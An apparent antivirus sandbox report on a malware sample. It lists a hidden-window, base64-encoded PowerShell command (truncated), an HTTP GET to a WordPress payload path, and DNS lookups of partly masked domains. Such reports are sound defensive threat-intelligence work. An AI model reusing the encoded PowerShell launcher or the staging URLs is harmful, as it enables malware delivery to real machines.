Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB0AHoAMAAwAFMAQwB1AGsAPQAnAGYAYwBCAEYAZAB6AG0AUwAnADsAJABJAEwASwBJAHUAOQAyACAAPQAgACcAMwAwADUAJwA7ACQAUQBoAGQAQQB6AHIAVwA4AD0AJwByAEcAagBDAEgAcQBFADIAJwA7ACQAQwBKAHQAaABGAG8AUQA9ACQAZ...
Network activity
Connects to
- 'cy########ityforyourbusiness.com':80
TCP
HTTP GET requests
- http://av#####exclusive.com/wp-content/y8rdi1z7935/
UDP
- DNS ASK av#####exclusive.com
- DNS ASK he####andgrebe.com
- DNS ASK ma###anima.com
- DNS ASK cy########ityforyourbusiness.com
- DNS ASK qs##id.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB0AHoAMAAwAFMAQwB1AGsAPQAnAGYAYwBCAEYAZAB6AG0AUwAnADsAJABJAEwASwBJAHUAOQAyACAAPQAgACcAMwAwADUAJwA7ACQAUQBoAGQAQQB6AHIAVwA4AD0AJwByAEcAagBDAEgAcQBFADIAJwA7ACQAQwBKAHQAaABGAG8AUQA9ACQAZ...' (with hidden window)
